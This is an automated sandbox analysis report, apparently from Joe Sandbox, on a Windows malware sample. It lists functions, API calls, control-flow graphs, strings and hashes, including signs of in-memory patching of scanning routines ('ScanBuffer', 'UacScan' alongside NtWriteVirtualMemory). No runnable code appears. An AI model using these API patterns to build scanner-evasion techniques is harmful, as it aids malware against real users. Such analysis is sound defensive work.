                      control_flow_graph 5652 2851a8c-2851a9b 5653 2851aa1-2851aa5 5652->5653 5654 2851b6c-2851b6f 5652->5654 5657 2851aa7-2851aae 5653->5657 5658 2851b08-2851b11 5653->5658 5655 2851b75-2851b7f 5654->5655 5656 2851c5c-2851c60 5654->5656 5660 2851b81-2851b8d 5655->5660 5661 2851b3c-2851b49 5655->5661 5664 2851c66-2851c6b 5656->5664 5665 28516e8-285170b call 2851644 VirtualFree 5656->5665 5662 2851ab0-2851abb 5657->5662 5663 2851adc-2851ade 5657->5663 5658->5657 5659 2851b13-2851b27 Sleep 5658->5659 5659->5657 5666 2851b2d-2851b38 Sleep 5659->5666 5669 2851bc4-2851bd2 5660->5669 5670 2851b8f-2851b92 5660->5670 5661->5660 5667 2851b4b-2851b5f Sleep 5661->5667 5671 2851ac4-2851ad9 5662->5671 5672 2851abd-2851ac2 5662->5672 5673 2851ae0-2851af1 5663->5673 5674 2851af3 5663->5674 5681 2851716 5665->5681 5682 285170d-2851714 5665->5682 5666->5658 5667->5660 5677 2851b61-2851b68 Sleep 5667->5677 5675 2851bd4-2851bd9 call 28514c0 5669->5675 5676 2851b96-2851b9a 5669->5676 5670->5676 5673->5674 5679 2851af6-2851b03 5673->5679 5674->5679 5675->5676 5683 2851bdc-2851be9 5676->5683 5684 2851b9c-2851ba2 5676->5684 5677->5661 5679->5655 5687 2851719-2851723 5681->5687 5682->5687 5683->5684 5686 2851beb-2851bf2 call 28514c0 5683->5686 5688 2851bf4-2851bfe 5684->5688 5689 2851ba4-2851bc2 call 2851500 5684->5689 5686->5684 5691 2851c00-2851c28 VirtualFree 5688->5691 5692 2851c2c-2851c59 call 2851560 5688->5692
                      APIs
                      • Sleep.KERNEL32(00000000,?,?,00000000,02851FE4), ref: 02851B17
                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02851FE4), ref: 02851B31
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: 8c89e87c8748c524c56b3c6c213f0a1e6a0e351350069d1b315a6e4a138dc013
                      • Instruction ID: 627b0647de13b4b6c176ad73f654235cff599a1d8f4c1cd3fb75b3072c537615
                      • Opcode Fuzzy Hash: 8c89e87c8748c524c56b3c6c213f0a1e6a0e351350069d1b315a6e4a138dc013
                      • Instruction Fuzzy Hash: A951F47D6012608FE716CF6CD988766BBD0AB45318F1885AEED4CCB2C6E770C845CB92
                      Function 0286E72A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0286E86A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603
                      • Opcode ID: 9879aa0d6e3434c99e9e1a1ddb8c9cc6a4b7bb10cae783adc439a7bd33215d39
                      • Instruction ID: 73e4a26cc2d30c19c47cf6bbfa36b8ad171f541c69319f826592fdef2e6f0e61
                      • Opcode Fuzzy Hash: 9879aa0d6e3434c99e9e1a1ddb8c9cc6a4b7bb10cae783adc439a7bd33215d39
                      • Instruction Fuzzy Hash: 27411F3DB102189FEB10EFA8D881EAEB7FAEF48710F214431E841E7251DA74AD458F52
                      Function 0286881C Relevance: 6.1, APIs: 4, Instructions: 65libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • LoadLibraryA.KERNEL32(00000000,00000000,02868903), ref: 02868850
                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02868903), ref: 02868860
                      • GetProcAddress.KERNEL32(74B20000,00000000), ref: 02868879
                        • Part of subcall function 02867CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02867D6C
                      • FreeLibrary.KERNEL32(74B20000,00000000,028B2388,Function_000065D8,00000004,028B2398,028B2388,000186A3,00000040,028B239C,74B20000,00000000,00000000,00000000,00000000,02868903), ref: 028688E3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Library$AddressFreeHandleLoadMemoryModuleProcVirtualWrite
                      • String ID:
                      • API String ID: 1543721669-0
                      • Opcode ID: c5b84804f1aeb5112d0a6c5acf7bac17e6e35f6b5b96f385b44d221215444829
                      • Instruction ID: f93059d52876ddacf5df35d78a5654b0bab0a6e79360e711164026d84a0e2ac8
                      • Opcode Fuzzy Hash: c5b84804f1aeb5112d0a6c5acf7bac17e6e35f6b5b96f385b44d221215444829
                      • Instruction Fuzzy Hash: D711847CA50325ABE701FBBCCC06A5E77E9EF49701F9008687E04EB3A5DA749A104B56
                      Function 0285E2E4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5855 285e2e4-285e2f0 5856 285e2f2-285e2f8 VariantClear call 285dfb0 5855->5856 5857 285e2ff-285e304 5855->5857 5861 285e2fd 5856->5861 5859 285e315-285e31a 5857->5859 5860 285e306-285e313 call 28544ac 5857->5860 5863 285e326-285e32b 5859->5863 5864 285e31c-285e324 5859->5864 5865 285e35b-285e35e 5860->5865 5861->5865 5867 285e336-285e341 call 2862e24 5863->5867 5868 285e32d-285e334 call 285e168 5863->5868 5864->5865 5874 285e343-285e34d 5867->5874 5875 285e34f-285e356 VariantClear VariantInit 5867->5875 5868->5865 5874->5865 5875->5865
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: ClearVariant
                      • String ID:
                      • API String ID: 1473721057-0
                      • Opcode ID: 30c2d4778b762ec8f64b4bdd2c2f615eb8db5d2f087580b0c957f340fd137f67
                      • Instruction ID: 0b345b809548e3375ff83ce499fafea07ca0b2da1de66aeee8ea31fcf38a5def
                      • Opcode Fuzzy Hash: 30c2d4778b762ec8f64b4bdd2c2f615eb8db5d2f087580b0c957f340fd137f67
                      • Instruction Fuzzy Hash: AAF0C22C708238C6DB247B3C8D845E9239B5F0570678C1477AC0ADB209CB349E45CB63
                      Function 0286705C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5877 286705c-28670a6 call 2854eec 5880 28670bf-28670c1 5877->5880 5881 28670a8-28670ba call 285afc8 call 2853e68 5877->5881 5883 28670c7-28670db 5880->5883 5884 2867288-28672af 5880->5884 5881->5880 5888 28670dd-28670f7 5883->5888 5886 28672b1-28672c0 5884->5886 5887 28672d9-28672dc 5884->5887 5894 28672c7-28672d7 5886->5894 5895 28672c2 5886->5895 5889 28672de-28672e0 5887->5889 5890 28672ed-2867309 5887->5890 5891 2867111-2867115 5888->5891 5892 28670f9-286710c 5888->5892 5889->5890 5896 28672e2-28672e6 5889->5896 5903 286730e-2867310 5890->5903 5898 2867117-2867126 5891->5898 5899 286718b-286718d 5891->5899 5897 286727f-2867282 5892->5897 5894->5890 5895->5894 5896->5890 5900 28672e8 5896->5900 5897->5884 5897->5888 5901 2867158-2867180 call 285535c 5898->5901 5902 2867128-2867156 call 285535c 5898->5902 5904 28671d4-28671d8 5899->5904 5905 286718f-2867193 5899->5905 5900->5890 5925 2867183-2867186 5901->5925 5902->5925 5909 2867312-2867315 call 2867634 5903->5909 5910 286731a-286731f 5903->5910 5906 286724d-2867264 5904->5906 5907 28671da-28671e2 5904->5907 5912 28671b7-28671cf 5905->5912 5913 2867195-286719f 5905->5913 5914 286727b 5906->5914 5918 2867266-286726a 5906->5918 5915 28671e4-2867220 call 285535c 5907->5915 5916 2867222-286724b 5907->5916 5909->5910 5921 2867321-286732e 5910->5921 5922 286733d-286734f 5910->5922 5912->5914 5913->5912 5923 28671a1-28671b2 call 285ea58 5913->5923 5914->5897 5915->5914 5916->5914 5918->5914 5926 286726c-2867278 5918->5926 5927 2867330-2867334 call 2855338 5921->5927 5928 2867339-286733b 5921->5928 5932 2867363 5922->5932 5933 2867351-2867361 SysFreeString 5922->5933 5923->5912 5925->5914 5926->5914 5927->5928 5928->5921 5928->5922 5933->5932 5933->5933
                      APIs
                      • SysFreeString.OLEAUT32(?), ref: 0286735A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FreeString
                      • String ID: H
                      • API String ID: 3341692771-2852464175
                      • Opcode ID: b7521b5fdd1b582dd50d48be102d40f7fd1ed5a724d588f96d50280bab60e42d
                      • Instruction ID: e50b06e99dbdfa1f56c79fff6a8d822361171dc8d17262981c0aafde138ee485
                      • Opcode Fuzzy Hash: b7521b5fdd1b582dd50d48be102d40f7fd1ed5a724d588f96d50280bab60e42d
                      • Instruction Fuzzy Hash: D7B1C078A016089FDB14CF99D584AADFBF2FF49318F248169E909EB364D731A845CF90
                      Function 0285E37C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5935 285e37c-285e38c 5936 285e38e-285e47c call 285e37c 5935->5936 5937 285e3ab-285e3af 5935->5937 5939 285e3b1-285e3b6 5937->5939 5940 285e3b8-285e3c4 VariantInit 5937->5940 5942 285e3c7-285e3e0 5939->5942 5940->5942 5944 285e3f0-285e3f5 5942->5944 5945 285e3e2 5942->5945 5947 285e3fc-285e403 5944->5947 5948 285e3f7-285e3fa 5944->5948 5946 285e3e4-285e3e7 5945->5946 5945->5947 5946->5947 5949 285e3e9-285e3ec 5946->5949 5951 285e405-285e412 call 28674c5 5947->5951 5952 285e447-285e458 5947->5952 5948->5947 5950 285e41d-285e429 call 2862e24 5948->5950 5949->5947 5954 285e3ee 5949->5954 5960 285e442 call 285dc18 5950->5960 5961 285e42b-285e440 5950->5961 5956 285e418-285e41b 5951->5956 5958 285e46f 5952->5958 5959 285e45a-285e46a call 285e78c call 285e360 5952->5959 5954->5950 5956->5952 5959->5958 5960->5952 5961->5952
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: InitVariant
                      • String ID:
                      • API String ID: 1927566239-0
                      • Opcode ID: 82681a7561d7c7491ef76e2254bf351cc4e2d8f1087cfc9c35be627f38c3bd90
                      • Instruction ID: a91a91bca7df3985876302404c95dee998188b83df7d8db6d0b853beb50d9a94
                      • Opcode Fuzzy Hash: 82681a7561d7c7491ef76e2254bf351cc4e2d8f1087cfc9c35be627f38c3bd90
                      • Instruction Fuzzy Hash: EC315E7EA00628ABDB11DFACCC84AEA77A8FB0C304F484565ED09D3650D334DB95CB62
                      Function 02866CEC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                      Download Yara Rule
                      APIs
                      • CLSIDFromProgID.OLE32(00000000,?,00000000,02866D39,?,?,?,00000000), ref: 02866D19
                        • Part of subcall function 02854C0C: SysFreeString.OLEAUT32(0286ED84), ref: 02854C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FreeFromProgString
                      • String ID:
                      • API String ID: 4225568880-0
                      • Opcode ID: 27bc27a76955573f9ac575370de4410d228ab56be9355bc985490e175fc9cc75
                      • Instruction ID: 0794bba74b5ecfff8ccdc30acffe5070507771460cdee9bfbccd3ca94d3ec2c1
                      • Opcode Fuzzy Hash: 27bc27a76955573f9ac575370de4410d228ab56be9355bc985490e175fc9cc75
                      • Instruction Fuzzy Hash: DBE0653D604768BFF711EFA9CC5196A77FEDB89B50B510471AC04D7600EB797D008861
                      Function 02855814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleFileNameA.KERNEL32(02850000,?,00000105), ref: 02855832
                        • Part of subcall function 02855A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,0287E790), ref: 02855A94
                        • Part of subcall function 02855A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,0287E790), ref: 02855AB2
                        • Part of subcall function 02855A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,0287E790), ref: 02855AD0
                        • Part of subcall function 02855A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855AEE
                        • Part of subcall function 02855A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B37
                        • Part of subcall function 02855A78: RegQueryValueExA.ADVAPI32(?,02855CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B7D,?,80000001), ref: 02855B55
                        • Part of subcall function 02855A78: RegCloseKey.ADVAPI32(?,02855B84,00000000,?,?,00000000,02855B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B77
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Open$FileModuleNameQueryValue$Close
                      • String ID:
                      • API String ID: 2796650324-0
                      • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction ID: 28d8e0ebe8f6f851b5751d84a2a56571850d60241c3004e4a0e74c6a605a6aba
                      • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                      • Instruction Fuzzy Hash: 02E06D79A002248BCB10DE5CC8C0B4737D8AB08754F4005A5EC58DF34AD374D9248BD1
                      Function 02857E10 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                      Download Yara Rule
                      APIs
                      • GetFileAttributesA.KERNEL32(00000000,?,0286FD00,ScanString,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanString,028B237C,0287B40C,UacScan,028B237C,0287B40C,UacInitialize), ref: 02857E1B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                      • Instruction ID: 3a45fa8f6f35a1062a3780829b397543e8328d05cfcf6f6cf46008abf7486ce2
                      • Opcode Fuzzy Hash: 81e72d02e34d49699fbcea4f3e8a1facf21165fd85f6b10d0c15ae5a9543b4f5
                      • Instruction Fuzzy Hash: F5C08CEC2123320A1E90A5FC0CC802A828819041393E46F21EE3CDA2E2E32188A32421
                      Function 02854C48 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SysFreeString.OLEAUT32(0286ED84), ref: 02854C1A
                      • SysReAllocStringLen.OLEAUT32(0287C2B4,0286ED84,000000B4), ref: 02854C62
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: String$AllocFree
                      • String ID:
                      • API String ID: 344208780-0
                      • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                      • Instruction ID: 6ddb9f235f671009c29c6d4094fe09d2f8d9b72b87987097029c2dc1bc9b899f
                      • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                      • Instruction Fuzzy Hash: 35D0127C5001215DBB2C9D994544A3A62BA99D030A389C2999C0ECA245EB719C80CA32
                      Function 0287BF84 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                      Download Yara Rule
                      APIs
                      • timeSetEvent.WINMM(00002710,00000000,0287BF78,00000000,00000001), ref: 0287BF94
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Eventtime
                      • String ID:
                      • API String ID: 2982266575-0
                      • Opcode ID: a7d3e7065645cca1ef4efcfdc7932e4edcb2ffed832baca75d394a8b51fad2b7
                      • Instruction ID: ffc6ea762edb79190c051cebfc684967a35a0b7a1fb13127aec835818e8b76af
                      • Opcode Fuzzy Hash: a7d3e7065645cca1ef4efcfdc7932e4edcb2ffed832baca75d394a8b51fad2b7
                      • Instruction Fuzzy Hash: 35C048E87883407AFE1096AD1CC2F37118EDB14B01F640492BA00EA2C1D1E298504A60
                      Function 028515CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02851A03), ref: 028515E2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 1c75a25bb96f1c22ac95fbd2a41ca6249efbf8cbe84423b8566bc1d14daf6d87
                      • Instruction ID: 42efa88d2618d1d59f6a7f1f1b1c6caffcd1e36f1a5b7250754add7803706306
                      • Opcode Fuzzy Hash: 1c75a25bb96f1c22ac95fbd2a41ca6249efbf8cbe84423b8566bc1d14daf6d87
                      • Instruction Fuzzy Hash: D0F067F8B413404FEB05CF7999843127BD2EB89348F208579EB09DB7D8EB7684028B00
                      Function 02851682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004), ref: 028516A4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: a2bea4e11f4371e1cc2357b9199378a3b7c5dfd846d836a8dc832cb0e6348e37
                      • Instruction ID: 7b42dc0a9ac649fbbb8211224891f1b8b7289670d797c39576d89d73a67ba02a
                      • Opcode Fuzzy Hash: a2bea4e11f4371e1cc2357b9199378a3b7c5dfd846d836a8dc832cb0e6348e37
                      • Instruction Fuzzy Hash: B3F0F0BEB00AA56BD3118E4A9CD8782BBE0FB00310F000139EA0CDB384D7B0A8108B98
                      Function 028516E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                      Download Yara Rule
                      APIs
                      • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02851FE4), ref: 02851704
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: FreeVirtual
                      • String ID:
                      • API String ID: 1263568516-0
                      • Opcode ID: b65a62ce8cf10d0bee5843db2601091b46cf43504eeebe094c7848a37b0339ae
                      • Instruction ID: aeffd7898bcb161dce4315fe808f77111fa5f9b31c613dd08db7d8c3489be171
                      • Opcode Fuzzy Hash: b65a62ce8cf10d0bee5843db2601091b46cf43504eeebe094c7848a37b0339ae
                      • Instruction Fuzzy Hash: 4EE0867D3403216FD7105A7D5D88712ABD8EB44654F244475F90DDB285D7A0E8108B64

                      Non-executed Functions

                      Function 0286A954 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0286ABDB,?,?,0286AC6D,00000000,0286AD49), ref: 0286A968
                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0286A980
